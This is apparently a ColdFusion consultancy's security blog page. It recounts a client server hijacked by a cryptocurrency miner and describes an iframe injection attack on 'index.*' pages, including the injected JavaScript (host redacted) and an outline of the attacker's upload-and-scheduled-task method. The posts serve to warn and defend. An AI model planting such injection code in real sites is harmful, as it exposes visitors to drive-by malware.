Cryptocurrency Miners Hacking Servers
Are your free CPU cycles making others rich? There's a chance they are and it's at your expense. A recent article at Vice.com states that "At Least 1.65 Million Computers Are Mining Cryptocurrency for Hackers So Far This Year". If this is to be believed then it's possible a server you are running has been compromised and is actually mining cyrptocurrency for the hackers.
Cyrptocurrency is an anonymous, digital currency that is supposed to be untraceable. It's used on the internet to purchase more and more products and services. One of the most common forms of cryptocurrency is Bitcoin. This is from the Wikipedia entry on Bitcoin.
Bitcoin is a worldwide cryptocurrency and digital payment system called the first decentralized digital currency, since the system works without a central repository or single administrator. It was invented by an unknown programmer, or a group of programmers, under the name Satoshi Nakamoto and released as open-source software in 2009. The system is peer-to-peer, and transactions take place between users directly, without an intermediary. These transactions are verified by network nodes and recorded in a public distributed ledger called a blockchain. Besides being created as a reward for mining, bitcoin can be exchanged for other currencies, products, and services. As of February 2015, over 100,000 merchants and vendors accepted bitcoin as payment. Bitcoin can also be held as an investment. According to research produced by Cambridge University in 2017, there are 2.9 to 5.8 million unique users using a cryptocurrency wallet, most of them using bitcoin. ...
Bitcoin Mining is a record-keeping service that runs on peoples computers, servers, or specialized Mining Devices, that are setup by individuals to help process Bitcoin transactions. As a reward for doing this you are given newly created bitcoins and transaction fees. ie. You can make money by mining for Bitcoin.
This reward is enough that hackers have taken it to the next level and started hacking servers around the world so they can install mining software and use YOUR computers and servers to make money for themselves. Just this week it was discovered that some of Showtime's web servers were mining cryptocurrency. This isn't a new thing either. Back in 2014 Iowa State University servers were also hacked for the purpose on mining Bitcoins. These are not isolated occurrences. They are happening regularly. This practice is free to the hackers an costly to the owners of the servers. Here's why.
Case Study
CF Webtools has seen this type of hack in the real world. We recently had a company come to us seeking our services for both Server Administration and ColdFusion programming. Part of taking this new company on as a client we performed a security review on all of their servers. They also had existing issues that we needed to look at in particular. One of their web servers was rebooting multiple times per day at what seemed like "random" intervals.
Upon review we found the web server was always running at 100% CPU usage with no services claiming to be using that much CPU power. Certainly not ColdFusion or IIS. After completing additional research we decided to install a malware removal tool and scanned for malware. It didn't take long to find that indeed there was malware running on the server. What we found surprised us only because we had not seen this in action before. It was a cryptocurrency miner and it was so intensive that it would crash the server. All attempts to remove the malware failed. It would end up back on the server in a short period of time. The fact is this server was compromised. To resolve the issue we sent one of our decommissioned, but powerful servers, preinstalled with a clean OS to their data center. Then our Operations Manager went on the road to install the new server as well as a physical firewall. We essentially rearchitected their entire server setup. Meanwhile the malware removal tool did it's best to keep the malware at bay while I recreated their web server on the new server. It was a busy week (or more), but we were able to clean the code on the clients server and put that on the new server. We also had to research and rebuild all the dependancies from scratch. When it was all said and done we replaced the compromised server with the new one and put all their servers behind a Cisco ASA.
This case of Hacking for Bitcoins proved costly in the end to the company who's systems were compromised all while providing a free profit to the hacker(s).
This is one more friendly reminder to make sure your ColdFusion servers are patched! Either patch them yourself, have your hosting provider patch them. If you need help upgrading your VM or patching your server (or anything else) our operations group is standing by 24/7 - give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.
VB Script For Iframe Injection Attack
Thanks to Nate from CF-Talk I have a copy of the malicious VBS script that is doing the damage. If you are being victimized by this attack and you need to see the script for whatever purpose, let me know and I will make sure you get a copy. I now it goes without saying, but just don't run it :).
Meanwhile there is some consensus, given the root access of this code, that an infected server cannot be trusted even after a thorough cleaning. Dave Watts and Tom Chiverton both gave such advice. While it's not always possible and it's a huge hassle, it might be the best solution to bite the bullet and do it.
Iframe Injection Follow Up
For those of you who have been following the Iframe injection attack saga (see Iframe Insertion on Index.* Home pages) I have an update. I would like to thank one of my readers named Kumar for referring me to this excellent article (a PDF File) on Black Hat. The article seems to pinpoint the origin and nature of the attack. The document describes an attack in depth with multiple steps (just as we had speculated). The first step was an SQLi attempt. But failing that the attacker compromised the server in a rather ingenious fashion.
- Using an image upload capability he uploaded a file to the server that "looked" like an image but was not.
- The file (containing executable code) was then hit with GET and POST requests.
- The payload of the get and post requests was able to set up scheduled tasks to append the JS code to "index.*" files on a timed basis.
This file that was uploaded was a CDX file. On a properly configured IIS server this attack would fail to succeed. Here's why.
Read MoreIframe Insertion on Index.* Home pages
There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page:
var applstrna0 = " ;
var applstrna1 = "rame src=http://***Domain Host Name****";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0> ;
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
</script>
As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the users machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note, if you have this problem and Google indexes your sites and sees these pages they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning.
The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (this thread), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.
Read MoreBob and Mary - HTML Injection Wars
I promised some information from the seminar on application security by Shlomy Gantz. This post is the first of what I hope is 3 or 4 posts unveiling some little thought about security issues when you are doing application programming. Of course we all know about cross site scripting (XSS), SQL injection attack (SIA) and acronym overload seizure (AOS). If you don't, you can find examples of the first two in part IV of my series on the Security Pyramid. In this article I'd like to explore what Shlomy called "HTML Injection". Now I knew that this little gem existed but mostly I thought of it as a XSS attack - where a user is able to place JavaScript designed to steal information from other unsuspecting users into a page (as in my cookie example). What Shlomy did was much harder to detect.
Read MorePodcast: The Security Pyramid Part IV - Securing Your Code
This is the fourth and final episode in the series, "the security pyramid". This entry covers the topic of "Personal Health", securing your application code. We cover cross site scripting, SQL injection attacks and a number of other topics. This podcast is nearly half an hour long. The examples I talk about in the podcast are covered in the original post. Posts from the other 4 parts of the series are listed below. Thanks for listening!
Listen Here
Security Pyramid Podcast - Part III (The Neighborhood)
This is the third in a series of 4 podcasts (I know, it was supposed to be 3) on the subject of "the security pyramid". This one covers the topic of "the neighborhood" where your application lives. The topic covers security issues related to your server configuration, coldfusion, and integration with external resources. All of the material covered in the podcasts is also covered in the 5 posts listed below, although the podcasts often include items that are not in the posts. Click on Part III below for the written vresion of this particular podcast. Thanks for listening!
Listen Here
Security Pyramid Podcast - Part II
This is the second of 3 podcasts on the subject of "the security pyramid". This one covers the topic of "internal network policy". All of the material covered in the podcasts is also covered in the 5 posts listed below, although the podcasts often include items that are not in the posts. Thanks for listening!
Listen Here
Sites to Watch
Aggregators
RSS
